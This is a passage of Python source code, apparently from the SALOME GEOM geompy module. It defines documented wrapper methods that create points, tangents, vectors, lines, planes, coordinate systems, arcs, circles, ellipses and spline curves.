publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created point.
Example of usage:
p_on_face = geompy.MakeVertexInsideFace(Face)
"""
# Example: see GEOM_TestAll.py
anObj = self.BasicOp.MakePointOnFace(theFace)
RaiseIfFailed("MakeVertexInsideFace", self.BasicOp)
self._autoPublish(anObj, theName, "vertex")
return anObj
## Create a point on intersection of two lines.
# @param theRefLine1, theRefLine2 The referenced lines.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created point.
#
# @ref swig_MakeVertexOnLinesIntersection "Example"
@ManageTransactions("BasicOp")
def MakeVertexOnLinesIntersection(self, theRefLine1, theRefLine2, theName=None):
"""
Create a point on intersection of two lines.
Parameters:
theRefLine1, theRefLine2 The referenced lines.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created point.
"""
# Example: see GEOM_TestAll.py
anObj = self.BasicOp.MakePointOnLinesIntersection(theRefLine1, theRefLine2)
RaiseIfFailed("MakePointOnLinesIntersection", self.BasicOp)
self._autoPublish(anObj, theName, "vertex")
return anObj
## Create a tangent, corresponding to the given parameter on the given curve.
# @param theRefCurve The referenced curve.
# @param theParameter Value of parameter on the referenced curve.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created tangent.
#
# @ref swig_MakeTangentOnCurve "Example"
@ManageTransactions("BasicOp")
def MakeTangentOnCurve(self, theRefCurve, theParameter, theName=None):
"""
Create a tangent, corresponding to the given parameter on the given curve.
Parameters:
theRefCurve The referenced curve.
theParameter Value of parameter on the referenced curve.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created tangent.
Example of usage:
tan_on_arc = geompy.MakeTangentOnCurve(Arc, 0.7)
"""
anObj = self.BasicOp.MakeTangentOnCurve(theRefCurve, theParameter)
RaiseIfFailed("MakeTangentOnCurve", self.BasicOp)
self._autoPublish(anObj, theName, "tangent")
return anObj
## Create a tangent plane, corresponding to the given parameter on the given face.
# @param theFace The face for which tangent plane should be built.
# @param theParameterV vertical value of the center point (0.0 - 1.0).
# @param theParameterU horisontal value of the center point (0.0 - 1.0).
# @param theTrimSize the size of plane.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created tangent.
#
# @ref swig_MakeTangentPlaneOnFace "Example"
@ManageTransactions("BasicOp")
def MakeTangentPlaneOnFace(self, theFace, theParameterU, theParameterV, theTrimSize, theName=None):
"""
Create a tangent plane, corresponding to the given parameter on the given face.
Parameters:
theFace The face for which tangent plane should be built.
theParameterV vertical value of the center point (0.0 - 1.0).
theParameterU horisontal value of the center point (0.0 - 1.0).
theTrimSize the size of plane.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created tangent.
Example of usage:
an_on_face = geompy.MakeTangentPlaneOnFace(tan_extrusion, 0.7, 0.5, 150)
"""
anObj = self.BasicOp.MakeTangentPlaneOnFace(theFace, theParameterU, theParameterV, theTrimSize)
RaiseIfFailed("MakeTangentPlaneOnFace", self.BasicOp)
self._autoPublish(anObj, theName, "tangent")
return anObj
## Create a vector with the given components.
# @param theDX X component of the vector.
# @param theDY Y component of the vector.
# @param theDZ Z component of the vector.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created vector.
#
# @ref tui_creation_vector "Example"
@ManageTransactions("BasicOp")
def MakeVectorDXDYDZ(self, theDX, theDY, theDZ, theName=None):
"""
Create a vector with the given components.
Parameters:
theDX X component of the vector.
theDY Y component of the vector.
theDZ Z component of the vector.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created vector.
"""
# Example: see GEOM_TestAll.py
theDX,theDY,theDZ,Parameters = ParseParameters(theDX, theDY, theDZ)
anObj = self.BasicOp.MakeVectorDXDYDZ(theDX, theDY, theDZ)
RaiseIfFailed("MakeVectorDXDYDZ", self.BasicOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "vector")
return anObj
## Create a vector between two points.
# @param thePnt1 Start point for the vector.
# @param thePnt2 End point for the vector.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created vector.
#
# @ref tui_creation_vector "Example"
@ManageTransactions("BasicOp")
def MakeVector(self, thePnt1, thePnt2, theName=None):
"""
Create a vector between two points.
Parameters:
thePnt1 Start point for the vector.
thePnt2 End point for the vector.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created vector.
"""
# Example: see GEOM_TestAll.py
anObj = self.BasicOp.MakeVectorTwoPnt(thePnt1, thePnt2)
RaiseIfFailed("MakeVectorTwoPnt", self.BasicOp)
self._autoPublish(anObj, theName, "vector")
return anObj
## Create a line, passing through the given point
# and parrallel to the given direction
# @param thePnt Point. The resulting line will pass through it.
# @param theDir Direction. The resulting line will be parallel to it.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created line.
#
# @ref tui_creation_line "Example"
@ManageTransactions("BasicOp")
def MakeLine(self, thePnt, theDir, theName=None):
"""
Create a line, passing through the given point
and parrallel to the given direction
Parameters:
thePnt Point. The resulting line will pass through it.
theDir Direction. The resulting line will be parallel to it.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created line.
"""
# Example: see GEOM_TestAll.py
anObj = self.BasicOp.MakeLine(thePnt, theDir)
RaiseIfFailed("MakeLine", self.BasicOp)
self._autoPublish(anObj, theName, "line")
return anObj
## Create a line, passing through the given points
# @param thePnt1 First of two points, defining the line.
# @param thePnt2 Second of two points, defining the line.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created line.
#
# @ref tui_creation_line "Example"
@ManageTransactions("BasicOp")
def MakeLineTwoPnt(self, thePnt1, thePnt2, theName=None):
"""
Create a line, passing through the given points
Parameters:
thePnt1 First of two points, defining the line.
thePnt2 Second of two points, defining the line.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created line.
"""
# Example: see GEOM_TestAll.py
anObj = self.BasicOp.MakeLineTwoPnt(thePnt1, thePnt2)
RaiseIfFailed("MakeLineTwoPnt", self.BasicOp)
self._autoPublish(anObj, theName, "line")
return anObj
## Create a line on two faces intersection.
# @param theFace1 First of two faces, defining the line.
# @param theFace2 Second of two faces, defining the line.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created line.
#
# @ref swig_MakeLineTwoFaces "Example"
@ManageTransactions("BasicOp")
def MakeLineTwoFaces(self, theFace1, theFace2, theName=None):
"""
Create a line on two faces intersection.
Parameters:
theFace1 First of two faces, defining the line.
theFace2 Second of two faces, defining the line.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created line.
"""
# Example: see GEOM_TestAll.py
anObj = self.BasicOp.MakeLineTwoFaces(theFace1, theFace2)
RaiseIfFailed("MakeLineTwoFaces", self.BasicOp)
self._autoPublish(anObj, theName, "line")
return anObj
## Create a plane, passing through the given point
# and normal to the given vector.
# @param thePnt Point, the plane has to pass through.
# @param theVec Vector, defining the plane normal direction.
# @param theTrimSize Half size of a side of quadrangle face, representing the plane.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created plane.
#
# @ref tui_creation_plane "Example"
@ManageTransactions("BasicOp")
def MakePlane(self, thePnt, theVec, theTrimSize, theName=None):
"""
Create a plane, passing through the given point
and normal to the given vector.
Parameters:
thePnt Point, the plane has to pass through.
theVec Vector, defining the plane normal direction.
theTrimSize Half size of a side of quadrangle face, representing the plane.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created plane.
"""
# Example: see GEOM_TestAll.py
theTrimSize, Parameters = ParseParameters(theTrimSize);
anObj = self.BasicOp.MakePlanePntVec(thePnt, theVec, theTrimSize)
RaiseIfFailed("MakePlanePntVec", self.BasicOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "plane")
return anObj
## Create a plane, passing through the three given points
# @param thePnt1 First of three points, defining the plane.
# @param thePnt2 Second of three points, defining the plane.
# @param thePnt3 Fird of three points, defining the plane.
# @param theTrimSize Half size of a side of quadrangle face, representing the plane.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created plane.
#
# @ref tui_creation_plane "Example"
@ManageTransactions("BasicOp")
def MakePlaneThreePnt(self, thePnt1, thePnt2, thePnt3, theTrimSize, theName=None):
"""
Create a plane, passing through the three given points
Parameters:
thePnt1 First of three points, defining the plane.
thePnt2 Second of three points, defining the plane.
thePnt3 Fird of three points, defining the plane.
theTrimSize Half size of a side of quadrangle face, representing the plane.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created plane.
"""
# Example: see GEOM_TestAll.py
theTrimSize, Parameters = ParseParameters(theTrimSize);
anObj = self.BasicOp.MakePlaneThreePnt(thePnt1, thePnt2, thePnt3, theTrimSize)
RaiseIfFailed("MakePlaneThreePnt", self.BasicOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "plane")
return anObj
## Create a plane, similar to the existing one, but with another size of representing face.
# @param theFace Referenced plane or LCS(Marker).
# @param theTrimSize New half size of a side of quadrangle face, representing the plane.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created plane.
#
# @ref tui_creation_plane "Example"
@ManageTransactions("BasicOp")
def MakePlaneFace(self, theFace, theTrimSize, theName=None):
"""
Create a plane, similar to the existing one, but with another size of representing face.
Parameters:
theFace Referenced plane or LCS(Marker).
theTrimSize New half size of a side of quadrangle face, representing the plane.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created plane.
"""
# Example: see GEOM_TestAll.py
theTrimSize, Parameters = ParseParameters(theTrimSize);
anObj = self.BasicOp.MakePlaneFace(theFace, theTrimSize)
RaiseIfFailed("MakePlaneFace", self.BasicOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "plane")
return anObj
## Create a plane, passing through the 2 vectors
# with center in a start point of the first vector.
# @param theVec1 Vector, defining center point and plane direction.
# @param theVec2 Vector, defining the plane normal direction.
# @param theTrimSize Half size of a side of quadrangle face, representing the plane.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created plane.
#
# @ref tui_creation_plane "Example"
@ManageTransactions("BasicOp")
def MakePlane2Vec(self, theVec1, theVec2, theTrimSize, theName=None):
"""
Create a plane, passing through the 2 vectors
with center in a start point of the first vector.
Parameters:
theVec1 Vector, defining center point and plane direction.
theVec2 Vector, defining the plane normal direction.
theTrimSize Half size of a side of quadrangle face, representing the plane.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created plane.
"""
# Example: see GEOM_TestAll.py
theTrimSize, Parameters = ParseParameters(theTrimSize);
anObj = self.BasicOp.MakePlane2Vec(theVec1, theVec2, theTrimSize)
RaiseIfFailed("MakePlane2Vec", self.BasicOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "plane")
return anObj
## Create a plane, based on a Local coordinate system.
# @param theLCS coordinate system, defining plane.
# @param theTrimSize Half size of a side of quadrangle face, representing the plane.
# @param theOrientation OXY, OYZ or OZX orientation - (1, 2 or 3)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created plane.
#
# @ref tui_creation_plane "Example"
@ManageTransactions("BasicOp")
def MakePlaneLCS(self, theLCS, theTrimSize, theOrientation, theName=None):
"""
Create a plane, based on a Local coordinate system.
Parameters:
theLCS coordinate system, defining plane.
theTrimSize Half size of a side of quadrangle face, representing the plane.
theOrientation OXY, OYZ or OZX orientation - (1, 2 or 3)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created plane.
"""
# Example: see GEOM_TestAll.py
theTrimSize, Parameters = ParseParameters(theTrimSize);
anObj = self.BasicOp.MakePlaneLCS(theLCS, theTrimSize, theOrientation)
RaiseIfFailed("MakePlaneLCS", self.BasicOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "plane")
return anObj
## Create a local coordinate system.
# @param OX,OY,OZ Three coordinates of coordinate system origin.
# @param XDX,XDY,XDZ Three components of OX direction
# @param YDX,YDY,YDZ Three components of OY direction
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created coordinate system.
#
# @ref swig_MakeMarker "Example"
@ManageTransactions("BasicOp")
def MakeMarker(self, OX,OY,OZ, XDX,XDY,XDZ, YDX,YDY,YDZ, theName=None):
"""
Create a local coordinate system.
Parameters:
OX,OY,OZ Three coordinates of coordinate system origin.
XDX,XDY,XDZ Three components of OX direction
YDX,YDY,YDZ Three components of OY direction
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created coordinate system.
"""
# Example: see GEOM_TestAll.py
OX,OY,OZ, XDX,XDY,XDZ, YDX,YDY,YDZ, Parameters = ParseParameters(OX,OY,OZ, XDX,XDY,XDZ, YDX,YDY,YDZ);
anObj = self.BasicOp.MakeMarker(OX,OY,OZ, XDX,XDY,XDZ, YDX,YDY,YDZ)
RaiseIfFailed("MakeMarker", self.BasicOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "lcs")
return anObj
## Create a local coordinate system from shape.
# @param theShape The initial shape to detect the coordinate system.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created coordinate system.
#
# @ref tui_creation_lcs "Example"
@ManageTransactions("BasicOp")
def MakeMarkerFromShape(self, theShape, theName=None):
"""
Create a local coordinate system from shape.
Parameters:
theShape The initial shape to detect the coordinate system.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created coordinate system.
"""
anObj = self.BasicOp.MakeMarkerFromShape(theShape)
RaiseIfFailed("MakeMarkerFromShape", self.BasicOp)
self._autoPublish(anObj, theName, "lcs")
return anObj
## Create a local coordinate system from point and two vectors.
# @param theOrigin Point of coordinate system origin.
# @param theXVec Vector of X direction
# @param theYVec Vector of Y direction
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created coordinate system.
#
# @ref tui_creation_lcs "Example"
@ManageTransactions("BasicOp")
def MakeMarkerPntTwoVec(self, theOrigin, theXVec, theYVec, theName=None):
"""
Create a local coordinate system from point and two vectors.
Parameters:
theOrigin Point of coordinate system origin.
theXVec Vector of X direction
theYVec Vector of Y direction
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created coordinate system.
"""
anObj = self.BasicOp.MakeMarkerPntTwoVec(theOrigin, theXVec, theYVec)
RaiseIfFailed("MakeMarkerPntTwoVec", self.BasicOp)
self._autoPublish(anObj, theName, "lcs")
return anObj
# end of l3_basic_go
## @}
## @addtogroup l4_curves
## @{
## Create an arc of circle, passing through three given points.
# @param thePnt1 Start point of the arc.
# @param thePnt2 Middle point of the arc.
# @param thePnt3 End point of the arc.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created arc.
#
# @ref swig_MakeArc "Example"
@ManageTransactions("CurvesOp")
def MakeArc(self, thePnt1, thePnt2, thePnt3, theName=None):
"""
Create an arc of circle, passing through three given points.
Parameters:
thePnt1 Start point of the arc.
thePnt2 Middle point of the arc.
thePnt3 End point of the arc.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created arc.
"""
# Example: see GEOM_TestAll.py
anObj = self.CurvesOp.MakeArc(thePnt1, thePnt2, thePnt3)
RaiseIfFailed("MakeArc", self.CurvesOp)
self._autoPublish(anObj, theName, "arc")
return anObj
## Create an arc of circle from a center and 2 points.
# @param thePnt1 Center of the arc
# @param thePnt2 Start point of the arc. (Gives also the radius of the arc)
# @param thePnt3 End point of the arc (Gives also a direction)
# @param theSense Orientation of the arc
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created arc.
#
# @ref swig_MakeArc "Example"
@ManageTransactions("CurvesOp")
def MakeArcCenter(self, thePnt1, thePnt2, thePnt3, theSense=False, theName=None):
"""
Create an arc of circle from a center and 2 points.
Parameters:
thePnt1 Center of the arc
thePnt2 Start point of the arc. (Gives also the radius of the arc)
thePnt3 End point of the arc (Gives also a direction)
theSense Orientation of the arc
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created arc.
"""
# Example: see GEOM_TestAll.py
anObj = self.CurvesOp.MakeArcCenter(thePnt1, thePnt2, thePnt3, theSense)
RaiseIfFailed("MakeArcCenter", self.CurvesOp)
self._autoPublish(anObj, theName, "arc")
return anObj
## Create an arc of ellipse, of center and two points.
# @param theCenter Center of the arc.
# @param thePnt1 defines major radius of the arc by distance from Pnt1 to Pnt2.
# @param thePnt2 defines plane of ellipse and minor radius as distance from Pnt3 to line from Pnt1 to Pnt2.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created arc.
#
# @ref swig_MakeArc "Example"
@ManageTransactions("CurvesOp")
def MakeArcOfEllipse(self, theCenter, thePnt1, thePnt2, theName=None):
"""
Create an arc of ellipse, of center and two points.
Parameters:
theCenter Center of the arc.
thePnt1 defines major radius of the arc by distance from Pnt1 to Pnt2.
thePnt2 defines plane of ellipse and minor radius as distance from Pnt3 to line from Pnt1 to Pnt2.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created arc.
"""
# Example: see GEOM_TestAll.py
anObj = self.CurvesOp.MakeArcOfEllipse(theCenter, thePnt1, thePnt2)
RaiseIfFailed("MakeArcOfEllipse", self.CurvesOp)
self._autoPublish(anObj, theName, "arc")
return anObj
## Create a circle with given center, normal vector and radius.
# @param thePnt Circle center.
# @param theVec Vector, normal to the plane of the circle.
# @param theR Circle radius.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created circle.
#
# @ref tui_creation_circle "Example"
@ManageTransactions("CurvesOp")
def MakeCircle(self, thePnt, theVec, theR, theName=None):
"""
Create a circle with given center, normal vector and radius.
Parameters:
thePnt Circle center.
theVec Vector, normal to the plane of the circle.
theR Circle radius.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created circle.
"""
# Example: see GEOM_TestAll.py
theR, Parameters = ParseParameters(theR)
anObj = self.CurvesOp.MakeCirclePntVecR(thePnt, theVec, theR)
RaiseIfFailed("MakeCirclePntVecR", self.CurvesOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "circle")
return anObj
## Create a circle with given radius.
# Center of the circle will be in the origin of global
# coordinate system and normal vector will be codirected with Z axis
# @param theR Circle radius.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created circle.
@ManageTransactions("CurvesOp")
def MakeCircleR(self, theR, theName=None):
"""
Create a circle with given radius.
Center of the circle will be in the origin of global
coordinate system and normal vector will be codirected with Z axis
Parameters:
theR Circle radius.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created circle.
"""
anObj = self.CurvesOp.MakeCirclePntVecR(None, None, theR)
RaiseIfFailed("MakeCirclePntVecR", self.CurvesOp)
self._autoPublish(anObj, theName, "circle")
return anObj
## Create a circle, passing through three given points
# @param thePnt1,thePnt2,thePnt3 Points, defining the circle.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created circle.
#
# @ref tui_creation_circle "Example"
@ManageTransactions("CurvesOp")
def MakeCircleThreePnt(self, thePnt1, thePnt2, thePnt3, theName=None):
"""
Create a circle, passing through three given points
Parameters:
thePnt1,thePnt2,thePnt3 Points, defining the circle.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created circle.
"""
# Example: see GEOM_TestAll.py
anObj = self.CurvesOp.MakeCircleThreePnt(thePnt1, thePnt2, thePnt3)
RaiseIfFailed("MakeCircleThreePnt", self.CurvesOp)
self._autoPublish(anObj, theName, "circle")
return anObj
## Create a circle, with given point1 as center,
# passing through the point2 as radius and laying in the plane,
# defined by all three given points.
# @param thePnt1,thePnt2,thePnt3 Points, defining the circle.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created circle.
#
# @ref swig_MakeCircle "Example"
@ManageTransactions("CurvesOp")
def MakeCircleCenter2Pnt(self, thePnt1, thePnt2, thePnt3, theName=None):
"""
Create a circle, with given point1 as center,
passing through the point2 as radius and laying in the plane,
defined by all three given points.
Parameters:
thePnt1,thePnt2,thePnt3 Points, defining the circle.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created circle.
"""
# Example: see GEOM_example6.py
anObj = self.CurvesOp.MakeCircleCenter2Pnt(thePnt1, thePnt2, thePnt3)
RaiseIfFailed("MakeCircleCenter2Pnt", self.CurvesOp)
self._autoPublish(anObj, theName, "circle")
return anObj
## Create an ellipse with given center, normal vector and radiuses.
# @param thePnt Ellipse center.
# @param theVec Vector, normal to the plane of the ellipse.
# @param theRMajor Major ellipse radius.
# @param theRMinor Minor ellipse radius.
# @param theVecMaj Vector, direction of the ellipse's main axis.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created ellipse.
#
# @ref tui_creation_ellipse "Example"
@ManageTransactions("CurvesOp")
def MakeEllipse(self, thePnt, theVec, theRMajor, theRMinor, theVecMaj=None, theName=None):
"""
Create an ellipse with given center, normal vector and radiuses.
Parameters:
thePnt Ellipse center.
theVec Vector, normal to the plane of the ellipse.
theRMajor Major ellipse radius.
theRMinor Minor ellipse radius.
theVecMaj Vector, direction of the ellipse's main axis.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created ellipse.
"""
# Example: see GEOM_TestAll.py
theRMajor, theRMinor, Parameters = ParseParameters(theRMajor, theRMinor)
if theVecMaj is not None:
anObj = self.CurvesOp.MakeEllipseVec(thePnt, theVec, theRMajor, theRMinor, theVecMaj)
else:
anObj = self.CurvesOp.MakeEllipse(thePnt, theVec, theRMajor, theRMinor)
pass
RaiseIfFailed("MakeEllipse", self.CurvesOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "ellipse")
return anObj
## Create an ellipse with given radiuses.
# Center of the ellipse will be in the origin of global
# coordinate system and normal vector will be codirected with Z axis
# @param theRMajor Major ellipse radius.
# @param theRMinor Minor ellipse radius.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created ellipse.
@ManageTransactions("CurvesOp")
def MakeEllipseRR(self, theRMajor, theRMinor, theName=None):
"""
Create an ellipse with given radiuses.
Center of the ellipse will be in the origin of global
coordinate system and normal vector will be codirected with Z axis
Parameters:
theRMajor Major ellipse radius.
theRMinor Minor ellipse radius.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created ellipse.
"""
anObj = self.CurvesOp.MakeEllipse(None, None, theRMajor, theRMinor)
RaiseIfFailed("MakeEllipse", self.CurvesOp)
self._autoPublish(anObj, theName, "ellipse")
return anObj
## Create a polyline on the set of points.
# @param thePoints Sequence of points for the polyline.
# @param theIsClosed If True, build a closed wire.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created polyline.
#
# @ref tui_creation_curve "Example"
@ManageTransactions("CurvesOp")
def MakePolyline(self, thePoints, theIsClosed=False, theName=None):
"""
Create a polyline on the set of points.
Parameters:
thePoints Sequence of points for the polyline.
theIsClosed If True, build a closed wire.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created polyline.
"""
# Example: see GEOM_TestAll.py
anObj = self.CurvesOp.MakePolyline(thePoints, theIsClosed)
RaiseIfFailed("MakePolyline", self.CurvesOp)
self._autoPublish(anObj, theName, "polyline")
return anObj
## Create bezier curve on the set of points.
# @param thePoints Sequence of points for the bezier curve.
# @param theIsClosed If True, build a closed curve.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created bezier curve.
#
# @ref tui_creation_curve "Example"
@ManageTransactions("CurvesOp")
def MakeBezier(self, thePoints, theIsClosed=False, theName=None):
"""
Create bezier curve on the set of points.
Parameters:
thePoints Sequence of points for the bezier curve.
theIsClosed If True, build a closed curve.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created bezier curve.
"""
# Example: see GEOM_TestAll.py
anObj = self.CurvesOp.MakeSplineBezier(thePoints, theIsClosed)
RaiseIfFailed("MakeSplineBezier", self.CurvesOp)
self._autoPublish(anObj, theName, "bezier")
return anObj
## Create B-Spline curve on the set of points.
# @param thePoints Sequence of points for the B-Spline curve.
# @param theIsClosed If True, build a closed curve.
# @param theDoReordering If TRUE, the algo does not follow the order of
# \a thePoints but searches for the closest vertex.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created B-Spline curve.
#
# @ref tui_creation_curve "Example"
@ManageTransactions("CurvesOp")
def MakeInterpol(self, thePoints, theIsClosed=False, theDoReordering=False, theName=None):
"""
Create B-Spline curve on the set of points.
Parameters:
thePoints Sequence of points for the B-Spline curve.
theIsClosed If True, build a closed curve.
theDoReordering If True, the algo does not follow the order of
thePoints but searches for the closest vertex.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created B-Spline curve.
"""
# Example: see GEOM_TestAll.py
anObj = self.CurvesOp.MakeSplineInterpolation(thePoints, theIsClosed, theDoReordering)
RaiseIfFailed("MakeInterpol", self.CurvesOp)
self._autoPublish(anObj, theName, "bspline")
return anObj
## Create B-Spline curve on the set of points.
# @param thePoints Sequence of points for the B-Spline curve.
# @param theFirstVec Vector object, defining the curve direction at its first point.
# @param theLastVec Vector object, defining the curve direction at its last point.
